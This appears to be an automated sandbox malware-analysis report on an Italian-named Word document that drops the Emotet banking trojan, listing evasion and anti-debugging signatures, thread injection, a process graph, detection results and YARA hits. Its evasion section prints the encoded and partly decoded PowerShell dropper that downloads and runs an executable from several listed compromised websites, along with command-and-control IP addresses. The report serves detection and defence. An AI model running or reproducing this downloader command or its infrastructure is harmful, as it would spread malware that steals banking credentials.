Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\982.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\982.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\sortedwatched.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\sortedwatched.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion:

barindex
Found evasive API chain (may stop execution after checking mutex)Show sources
Source: C:\Windows\System32\sortedwatched.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_12-2912
Source: C:\Users\user\982.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_5-2961
Checks the free space of harddrivesShow sources
Source: C:\Users\user\982.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Contains functionality to enumerate running servicesShow sources
Source: C:\Users\user\982.exeCode function: EnumServicesStatusExW,GetLastError,EnumServicesStatusExW,GetTickCount,OpenServiceW,QueryServiceConfig2W,GetLastError,QueryServiceConfig2W,CloseServiceHandle,7_2_0040F504
Source: C:\Windows\System32\sortedwatched.exeCode function: EnumServicesStatusExW,GetLastError,EnumServicesStatusExW,GetTickCount,OpenServiceW,QueryServiceConfig2W,GetLastError,QueryServiceConfig2W,CloseServiceHandle,12_2_0040F504
Contains long sleeps (>= 3 min)Show sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Enumerates the file systemShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Found evasive API chain (may stop execution after checking a module file name)Show sources
Source: C:\Users\user\982.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_4-29669
Found large amount of non-executed APIsShow sources
Source: C:\Users\user\982.exeAPI coverage: 6.9 %
Source: C:\Users\user\982.exeAPI coverage: 6.6 %
May sleep (evasive loops) to hinder dynamic analysisShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2920Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Users\user\982.exe TID: 3744Thread sleep time: -60000s >= -30000sJump to behavior
Source: C:\Windows\System32\sortedwatched.exe TID: 3836Thread sleep time: -60000s >= -30000sJump to behavior
Contains functionality to query system informationShow sources
Source: C:\Users\user\982.exeCode function: 4_2_00427ECC VirtualQuery,GetSystemInfo,GetModuleHandleW,GetProcAddress,VirtualAlloc,VirtualProtect,4_2_00427ECC
Program exit pointsShow sources
Source: C:\Users\user\982.exeAPI call chain: ExitProcess graph end nodegraph_4-29872
Source: C:\Users\user\982.exeAPI call chain: ExitProcess graph end nodegraph_5-2880
Source: C:\Users\user\982.exeAPI call chain: ExitProcess graph end nodegraph_7-2847
Source: C:\Windows\System32\sortedwatched.exeAPI call chain: ExitProcess graph end nodegraph_12-2829
Source: C:\Windows\System32\sortedwatched.exeAPI call chain: ExitProcess graph end nodegraph_12-2837
Queries a list of all running processesShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging:

barindex
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))Show sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSystem information queried: KernelDebuggerInformationJump to behavior
Contains functionality to check if a debugger is running (IsDebuggerPresent)Show sources
Source: C:\Users\user\982.exeCode function: 4_2_0042E3B3 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_0042E3B3
Contains functionality to create guard pages, often used to hinder reverse engineering and debuggingShow sources
Source: C:\Users\user\982.exeCode function: 4_2_00427ECC VirtualProtect ?,-00000001,00000104,?4_2_00427ECC
Contains functionality to dynamically determine API callsShow sources
Source: C:\Users\user\982.exeCode function: 4_2_00432522 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,4_2_00432522
Contains functionality to read the PEBShow sources
Source: C:\Users\user\982.exeCode function: 4_2_00407F70 mov eax, dword ptr fs:[00000030h]4_2_00407F70
Source: C:\Users\user\982.exeCode function: 4_2_002C213F mov eax, dword ptr fs:[00000030h]4_2_002C213F
Source: C:\Users\user\982.exeCode function: 4_2_002C219F mov eax, dword ptr fs:[00000030h]4_2_002C219F
Source: C:\Users\user\982.exeCode function: 4_2_002C0467 mov eax, dword ptr fs:[00000030h]4_2_002C0467
Source: C:\Users\user\982.exeCode function: 4_2_002C3743 mov eax, dword ptr fs:[00000030h]4_2_002C3743
Source: C:\Users\user\982.exeCode function: 4_2_002C2C0C mov eax, dword ptr fs:[00000030h]4_2_002C2C0C
Source: C:\Users\user\982.exeCode function: 4_2_004F0E18 push dword ptr fs:[00000030h]4_2_004F0E18
Source: C:\Users\user\982.exeCode function: 4_2_00522860 mov eax, dword ptr fs:[00000030h]4_2_00522860
Source: C:\Users\user\982.exeCode function: 4_2_00522800 mov eax, dword ptr fs:[00000030h]4_2_00522800
Source: C:\Users\user\982.exeCode function: 5_2_00401E04 mov eax, dword ptr fs:[00000030h]5_2_00401E04
Source: C:\Users\user\982.exeCode function: 5_2_004012CD mov eax, dword ptr fs:[00000030h]5_2_004012CD
Source: C:\Users\user\982.exeCode function: 6_2_003E2C0C mov eax, dword ptr fs:[00000030h]6_2_003E2C0C
Source: C:\Users\user\982.exeCode function: 6_2_003E0467 mov eax, dword ptr fs:[00000030h]6_2_003E0467
Source: C:\Users\user\982.exeCode function: 6_2_003E213F mov eax, dword ptr fs:[00000030h]6_2_003E213F
Source: C:\Users\user\982.exeCode function: 6_2_003E3743 mov eax, dword ptr fs:[00000030h]6_2_003E3743
Source: C:\Users\user\982.exeCode function: 6_2_003E219F mov eax, dword ptr fs:[00000030h]6_2_003E219F
Source: C:\Users\user\982.exeCode function: 6_2_00470E18 push dword ptr fs:[00000030h]6_2_00470E18
Source: C:\Users\user\982.exeCode function: 6_2_00492860 mov eax, dword ptr fs:[00000030h]6_2_00492860
Source: C:\Users\user\982.exeCode function: 6_2_00492800 mov eax, dword ptr fs:[00000030h]6_2_00492800
Source: C:\Users\user\982.exeCode function: 7_2_00401E04 mov eax, dword ptr fs:[00000030h]7_2_00401E04
Source: C:\Users\user\982.exeCode function: 7_2_004012CD mov eax, dword ptr fs:[00000030h]7_2_004012CD
Source: C:\Users\user\982.exeCode function: 7_1_00401E04 mov eax, dword ptr fs:[00000030h]7_1_00401E04
Source: C:\Users\user\982.exeCode function: 7_1_004012CD mov eax, dword ptr fs:[00000030h]7_1_004012CD
Source: C:\Windows\System32\sortedwatched.exeCode function: 9_2_003E2C0C mov eax, dword ptr fs:[00000030h]9_2_003E2C0C
Source: C:\Windows\System32\sortedwatched.exeCode function: 9_2_003E0467 mov eax, dword ptr fs:[00000030h]9_2_003E0467
Source: C:\Windows\System32\sortedwatched.exeCode function: 9_2_003E213F mov eax, dword ptr fs:[00000030h]9_2_003E213F
Source: C:\Windows\System32\sortedwatched.exeCode function: 9_2_003E3743 mov eax, dword ptr fs:[00000030h]9_2_003E3743
Source: C:\Windows\System32\sortedwatched.exeCode function: 9_2_003E219F mov eax, dword ptr fs:[00000030h]9_2_003E219F
Source: C:\Windows\System32\sortedwatched.exeCode function: 9_2_00580E18 push dword ptr fs:[00000030h]9_2_00580E18
Source: C:\Windows\System32\sortedwatched.exeCode function: 9_2_005A2860 mov eax, dword ptr fs:[00000030h]9_2_005A2860
Source: C:\Windows\System32\sortedwatched.exeCode function: 9_2_005A2800 mov eax, dword ptr fs:[00000030h]9_2_005A2800
Source: C:\Windows\System32\sortedwatched.exeCode function: 11_2_003F0E18 push dword ptr fs:[00000030h]11_2_003F0E18
Source: C:\Windows\System32\sortedwatched.exeCode function: 11_2_004F0467 mov eax, dword ptr fs:[00000030h]11_2_004F0467
Source: C:\Windows\System32\sortedwatched.exeCode function: 11_2_004F2C0C mov eax, dword ptr fs:[00000030h]11_2_004F2C0C
Source: C:\Windows\System32\sortedwatched.exeCode function: 11_2_004F3743 mov eax, dword ptr fs:[00000030h]11_2_004F3743
Source: C:\Windows\System32\sortedwatched.exeCode function: 11_2_004F213F mov eax, dword ptr fs:[00000030h]11_2_004F213F
Source: C:\Windows\System32\sortedwatched.exeCode function: 11_2_004F219F mov eax, dword ptr fs:[00000030h]11_2_004F219F
Source: C:\Windows\System32\sortedwatched.exeCode function: 11_2_005B2860 mov eax, dword ptr fs:[00000030h]11_2_005B2860
Source: C:\Windows\System32\sortedwatched.exeCode function: 11_2_005B2800 mov eax, dword ptr fs:[00000030h]11_2_005B2800
Source: C:\Windows\System32\sortedwatched.exeCode function: 12_2_00401E04 mov eax, dword ptr fs:[00000030h]12_2_00401E04
Source: C:\Windows\System32\sortedwatched.exeCode function: 12_2_004012CD mov eax, dword ptr fs:[00000030h]12_2_004012CD
Source: C:\Windows\System32\sortedwatched.exeCode function: 12_1_00401E04 mov eax, dword ptr fs:[00000030h]12_1_00401E04
Source: C:\Windows\System32\sortedwatched.exeCode function: 12_1_004012CD mov eax, dword ptr fs:[00000030h]12_1_004012CD
Contains functionality which may be used to detect a debugger (GetProcessHeap)Show sources
Source: C:\Users\user\982.exeCode function: 4_2_004016A0 GetProcessHeap,HeapFree,4_2_004016A0
Enables debug privilegesShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Contains functionality to register its own exception handlerShow sources
Source: C:\Users\user\982.exeCode function: 4_2_0042B721 SetUnhandledExceptionFilter,4_2_0042B721
Source: C:\Users\user\982.exeCode function: 4_2_0042E3B3 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_0042E3B3
Source: C:\Users\user\982.exeCode function: 4_2_0043146A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_0043146A
Source: C:\Users\user\982.exeCode function: 4_2_00427DFF IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_00427DFF

HIPS / PFW / Operating System Protection Evasion:

barindex
Encrypted powershell cmdline option foundShow sources
Source: unknownProcess created: Base64 decoded $mHKwRF='JIbnvfoL';$b3aSim4_ = '982';$GvHK2M='n_vPjrp';$QziABB6L=$env:userprofile+'\'+$b3aSim4_+'.exe';$jwt7_N='Z6G6oToS';$z_nf09=.('new-'+'ob'+'ject') nEt.WebClient;$EIpSGwu='https://sabiosdelamor.co/wp-content/VtyEqoElo/@https://www.euroausili.it/wp-content/iIFSXTWmN/@https://opel.km.ua/blogs/3uju_tiowf9i-149/@https://hablabestop.live/rqbe9p/pKkLiuqGj/@https://dogongulong.vn/wp-admin/vaIDeyDj/'."sP`liT"('@');$Xn9Tjqi='W548GPbi';foreach($CiXHiW in $EIpSGwu){try{$z_nf09."d`ow`N`lOADFIle"($CiXHiW, $Qz
Maps a DLL or memory area into another processShow sources
Source: C:\Users\user\982.exeSection loaded: unknown target pid: 3668 protection: execute and read and writeJump to behavior
Modifies the context of a thread in another process (thread injection)Show sources
Source: C:\Users\user\982.exeThread register set: target process: 3668Jump to behavior
Source: C:\Users\user\982.exeThread register set: target process: 3600Jump to behavior
Source: C:\Windows\System32\sortedwatched.exeThread register set: target process: 3704Jump to behavior
Source: C:\Windows\System32\sortedwatched.exeThread register set: target process: 3780Jump to behavior
Sets debug register (to hijack the execution of another thread)Show sources
Source: C:\Users\user\982.exeThread register set: 3668 775EA4F4Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)Show sources
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -encod JABtAEgASwB3AFIARgA9ACcASgBJAGIAbgB2AGYAbwBMACcAOwAkAGIAMwBhAFMAaQBtADQAXwAgAD0AIAAnADkAOAAyACcAOwAkAEcAdgBIAEsAMgBNAD0AJwBuAF8AdgBQAGoAcgBwACcAOwAkAFEAegBpAEEAQgBCADYATAA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAYgAzAGEAUwBpAG0ANABfACsAJwAuAGUAeABlACcAOwAkAGoAdwB0ADcAXwBOAD0AJwBaADYARwA2AG8AVABvAFMAJwA7ACQAegBfAG4AZgAwADkAPQAuACgAJwBuAGUAdwAtACcAKwAnAG8AYgAnACsAJwBqAGUAYwB0ACcAKQAgAG4ARQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAEUASQBwAFMARwB3AHUAPQAnAGgAdAB0AHAAcwA6AC8ALwBzAGEAYgBpAG8AcwBkAGUAbABhAG0AbwByAC4AYwBvAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAFYAdAB5AEUAcQBvAEUAbABvAC8AQABoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBlAHUAcgBvAGEAdQBzAGkAbABpAC4AaQB0AC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAGkASQBGAFMAWABUAFcAbQBOAC8AQABoAHQAdABwAHMAOgAvAC8AbwBwAGUAbAAuAGsAbQAuAHUAYQAvAGIAbABvAGcAcwAvADMAdQBqAHUAXwB0AGkAbwB3AGYAOQBpAC0AMQA0ADkALwBAAGgAdAB0AHAAcwA6AC8ALwBoAGEAYgBsAGEAYgBlAHMAdABvAHAALgBsAGkAdgBlAC8AcgBxAGIAZQA5AHAALwBwAEsAawBMAGkAdQBxAEcAagAvA

Language, Device and Operating System Detection:

barindex
Contains functionality locales information (e.g. system language)Show sources
Source: C:\Users\user\982.exeCode function: GetLocaleInfoA,4_2_00435022
Source: C:\Users\user\982.exeCode function: GetLocaleInfoW,__snwprintf_s,LoadLibraryW,4_2_0041CEDC
Contains functionality to query CPU information (cpuid)Show sources
Source: C:\Users\user\982.exeCode function: 4_2_004093C0 cpuid 4_2_004093C0
Queries the volume information (name, serial number etc) of a deviceShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Users\user\982.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\sortedwatched.exeQueries volume information: C:\ VolumeInformationJump to behavior
Contains functionality to query local / system timeShow sources
Source: C:\Users\user\982.exeCode function: 4_2_0042C660 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,RtlQueryPerformanceCounter,4_2_0042C660
Contains functionality to query windows versionShow sources
Source: C:\Users\user\982.exeCode function: 4_2_0040B793 _memset,GetVersionExA,4_2_0040B793
Queries the cryptographic machine GUIDShow sources
Source: C:\Users\user\982.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Sample Distance (10 = nearest)
10 9 8 7 6 5 4 3 2 1
Samplename Analysis ID SHA256 Similarity

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 961422 Sample: Nuovo_documento_2019.09.20.doc Startdate: 20/09/2019 Architecture: WINDOWS Score: 100 47 Antivirus or Machine Learning detection for sample 2->47 49 Multi AV Scanner detection for submitted file 2->49 51 Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) 2->51 53 3 other signatures 2->53 9 powershell.exe 12 7 2->9         started        14 sortedwatched.exe 36 2->14         started        16 WINWORD.EXE 26 72 2->16         started        18 mscorsvw.exe 2 2->18         started        process3 dnsIp4 45 sabiosdelamor.co 198.49.65.242, 443, 49163 unknown United States 9->45 39 C:\Users\user\982.exe, PE32 9->39 dropped 65 Drops PE files to the user root directory 9->65 67 Powershell drops PE file 9->67 20 982.exe 24 9->20         started        69 Detected unpacking (changes PE section rights) 14->69 71 Detected unpacking (overwrites its own PE header) 14->71 73 Detected Emotet e-Banking trojan 14->73 75 2 other signatures 14->75 23 sortedwatched.exe 14->23         started        file5 signatures6 process7 signatures8 55 Multi AV Scanner detection for dropped file 20->55 57 Detected unpacking (changes PE section rights) 20->57 59 Detected unpacking (overwrites its own PE header) 20->59 61 5 other signatures 20->61 25 982.exe 20->25         started        27 sortedwatched.exe 30 23->27         started        process9 signatures10 30 982.exe 24 25->30         started        77 Drops executables to the windows directory (C:\Windows) and starts them 27->77 79 Modifies the context of a thread in another process (thread injection) 27->79 33 sortedwatched.exe 9 27->33         started        process11 dnsIp12 81 Modifies the context of a thread in another process (thread injection) 30->81 36 982.exe 1 30->36         started        41 149.167.86.174, 990 unknown Australia 33->41 43 181.164.8.25, 80 unknown Argentina 33->43 signatures13 process14 signatures15 63 Hides that the sample has been downloaded from the Internet (zone.identifier) 36->63

Simulations

Behavior and APIs

TimeTypeDescription
13:29:43API Interceptor47x Sleep call for process: powershell.exe modified
13:29:48API Interceptor67x Sleep call for process: 982.exe modified
13:29:59API Interceptor892x Sleep call for process: sortedwatched.exe modified

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
Nuovo_documento_2019.09.20.doc22%VirustotalBrowse
Nuovo_documento_2019.09.20.doc100%Joe Sandbox ML

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\982.exe16%VirustotalBrowse

Unpacked PE Files

SourceDetectionScannerLabelLinkDownload
7.1.982.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
5.2.982.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
10.2.sortedwatched.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
9.2.sortedwatched.exe.5a3000.2.unpack100%AviraTR/Crypt.XPACK.GenDownload File
7.2.982.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
6.2.982.exe.493000.2.unpack100%AviraTR/Crypt.XPACK.GenDownload File
11.2.sortedwatched.exe.5b3000.2.unpack100%AviraTR/Crypt.XPACK.GenDownload File
10.1.sortedwatched.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
4.2.982.exe.523000.2.unpack100%AviraTR/Crypt.XPACK.GenDownload File
12.1.sortedwatched.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
12.2.sortedwatched.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
5.1.982.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File

Domains

SourceDetectionScannerLabelLink
sabiosdelamor.co0%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
http://181.164.8.25/attrib/schema/pdf/merge/0%Avira URL Cloudsafe
http://181.164.8.25/attrib/schema/pdf/merge/n0%Avira URL Cloudsafe

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000B.00000002.327369163.004F0000.00000040.00000001.sdmpEmotetdetect Emotet in memoryJPCERT/CC Incident Response Group
  • 0x3750:$v5a: 69 01 6D 4E C6 41 05 39 30 00 00
00000007.00000002.324668034.00400000.00000040.00000001.sdmpEmotetdetect Emotet in memoryJPCERT/CC Incident Response Group
  • 0x1e11:$v5a: 69 01 6D 4E C6 41 05 39 30 00 00
0000000A.00000002.322151721.00400000.00000040.00000001.sdmpEmotetdetect Emotet in memoryJPCERT/CC Incident Response Group
  • 0x1e11:$v5a: 69 01 6D 4E C6 41 05 39 30 00 00
0000000B.00000002.327425390.005B3000.00000004.00000001.sdmpEmotetdetect Emotet in memoryJPCERT/CC Incident Response Group
  • 0x1211:$v5a: 69 01 6D 4E C6 41 05 39 30 00 00
0000000A.00000001.321515804.00400000.00000040.00020000.sdmpEmotetdetect Emotet in memoryJPCERT/CC Incident Response Group
  • 0x1e11:$v5a: 69 01 6D 4E C6 41 05 39 30 00 00
00000007.00000001.301581248.00400000.00000040.00020000.sdmpEmotetdetect Emotet in memoryJPCERT/CC Incident Response Group
  • 0x1e11:$v5a: 69 01 6D 4E C6 41 05 39 30 00 00
00000004.00000002.296876594.002C0000.00000040.00000001.sdmpEmotetdetect Emotet in memoryJPCERT/CC Incident Response Group
  • 0x3750:$v5a: 69 01 6D 4E C6 41 05 39 30 00 00
00000006.00000002.302449572.003E0000.00000040.00000001.sdmpEmotetdetect Emotet in memoryJPCERT/CC Incident Response Group
  • 0x3750:$v5a: 69 01 6D 4E C6 41 05 39 30 00 00
0000000C.00000002.559716338.00400000.00000040.00000001.sdmpEmotetdetect Emotet in memoryJPCERT/CC Incident Response Group
  • 0x1e11:$v5a: 69 01 6D 4E C6 41 05 39 30 00 00
0000000C.00000001.326445222.00400000.00000040.00020000.sdmpEmotetdetect Emotet in memoryJPCERT/CC Incident Response Group
  • 0x1e11:$v5a: 69 01 6D 4E C6 41 05 39 30 00 00
00000006.00000002.302707019.00493000.00000004.00000001.sdmpEmotetdetect Emotet in memoryJPCERT/CC Incident Response Group
  • 0x1211:$v5a: 69 01 6D 4E C6 41 05 39 30 00 00
00000005.00000002.296478770.00400000.00000040.00000001.sdmpEmotetdetect Emotet in memoryJPCERT/CC Incident Response Group
  • 0x1e11:$v5a: 69 01 6D 4E C6 41 05 39 30 00 00
00000009.00000002.323191242.005A3000.00000004.00000001.sdmpEmotetdetect Emotet in memoryJPCERT/CC Incident Response Group
  • 0x1211:$v5a: 69 01 6D 4E C6 41 05 39 30 00 00
00000005.00000001.295966721.00400000.00000040.00020000.sdmpEmotetdetect Emotet in memoryJPCERT/CC Incident Response Group
  • 0x1e11:$v5a: 69 01 6D 4E C6 41 05 39 30 00 00
00000009.00000002.322934550.003E0000.00000040.00000001.sdmpEmotetdetect Emotet in memoryJPCERT/CC Incident Response Group
  • 0x3750:$v5a: 69 01 6D 4E C6 41 05 39 30 00 00
00000004.00000002.297316445.00523000.00000004.00000001.sdmpEmotetdetect Emotet in memoryJPCERT/CC Incident Response Group
  • 0x1211:$v5a: 69 01 6D 4E C6 41 05 39 30 00 00

Unpacked PEs

SourceRuleDescriptionAuthorStrings
5.2.982.exe.400000.0.unpackEmotetdetect Emotet in memoryJPCERT/CC Incident Response Group
  • 0x1211:$v5a: 69 01 6D 4E C6 41 05 39 30 00 00
7.1.982.exe.400000.0.unpackEmotetdetect Emotet in memoryJPCERT/CC Incident Response Group
  • 0x1211:$v5a: 69 01 6D 4E C6 41 05 39 30 00 00
12.1.sortedwatched.exe.400000.0.raw.unpackEmotetdetect Emotet in memoryJPCERT/CC Incident Response Group
  • 0x1e11:$v5a: 69 01 6D 4E C6 41 05 39 30 00 00
10.2.sortedwatched.exe.400000.0.raw.unpackEmotetdetect Emotet in memoryJPCERT/CC Incident Response Group
  • 0x1e11:$v5a: 69 01 6D 4E C6 41 05 39 30 00 00
10.2.sortedwatched.exe.400000.0.unpackEmotetdetect Emotet in memoryJPCERT/CC Incident Response Group
  • 0x1211:$v5a: 69 01 6D 4E C6 41 05 39 30 00 00
9.2.sortedwatched.exe.5a3000.2.unpackEmotetdetect Emotet in memoryJPCERT/CC Incident Response Group
  • 0x611:$v5a: 69 01 6D 4E C6 41 05 39 30 00 00
12.2.sortedwatched.exe.400000.0.raw.unpackEmotetdetect Emotet in memoryJPCERT/CC Incident Response Group
  • 0x1e11:$v5a: 69 01 6D 4E C6 41 05 39 30 00 00
4.2.982.exe.523000.2.raw.unpackEmotetdetect Emotet in memoryJPCERT/CC Incident Response Group
  • 0x1211:$v5a: 69 01 6D 4E C6 41 05 39 30 00 00
7.2.982.exe.400000.0.raw.unpackEmotetdetect Emotet in memoryJPCERT/CC Incident Response Group
  • 0x1e11:$v5a: 69 01 6D 4E C6 41 05 39 30 00 00
5.2.982.exe.400000.0.raw.unpackEmotetdetect Emotet in memoryJPCERT/CC Incident Response Group
  • 0x1e11:$v5a: 69 01 6D 4E C6 41 05 39 30 00 00
7.1.982.exe.400000.0.raw.unpackEmotetdetect Emotet in memoryJPCERT/CC Incident Response Group
  • 0x1e11:$v5a: 69 01 6D 4E C6 41 05 39 30 00 00
7.2.982.exe.400000.0.unpackEmotetdetect Emotet in memoryJPCERT/CC Incident Response Group
  • 0x1211:$v5a: 69 01 6D 4E C6 41 05 39 30 00 00
